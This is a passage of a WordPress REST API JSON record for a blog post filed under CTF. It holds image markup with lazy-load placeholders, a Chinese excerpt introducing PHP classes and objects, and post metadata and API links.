class=\"wp-image-131\"  sizes=\"auto, (max-width: 823px) 100vw, 823px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-102.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"823\" height=\"226\" data-attachment-id=\"132\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=132\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-102.png\" data-orig-size=\"823,226\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-102-300x82.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-102.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-102.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-132\"  sizes=\"auto, (max-width: 823px) 100vw, 823px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u7c7b\u4e0e\u5bf9\u8c61 
php\u9762\u5411\u5bf9\u8c61\u5f00\u53d1\u7684\u5185\u5bb9 \u7c7b \u2212 \u5b9a\u4e49\u4e86\u4e00\u4ef6\u4e8b\u7269\u7684\u62bd\u8c61\u7279\u70b9\u3002\u7c7b\u7684\u5b9a\u4e49\u5305\u542b\u4e86\u6570\u636e\u7684\u5f62\u5f0f\u4ee5\u53ca\u5bf9\u6570\u636e\u7684\u64cd\u4f5c [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":133,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[3],"tags":[9,5],"class_list":["post-67","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf","tag-php","tag-5"],"jetpack_featured_media_url":"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/36eac309685be1c9a7ef882be99d663f7c9fe353.webp","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=\/wp\/v2\/posts\/67","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=67"}],"version-history":[{"count":1,"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=\/wp\/v2\/posts\/67\/revisions"}],"predecessor-version":[{"id":137,"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=\/wp\/v2\/posts\/67\/revisions\/137"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=\/wp\/v2\/media\/133"}],"wp:attachment":[{"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=67"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=67"},{"taxonomy":"post_tag"
,"embeddable":true,"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=67"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}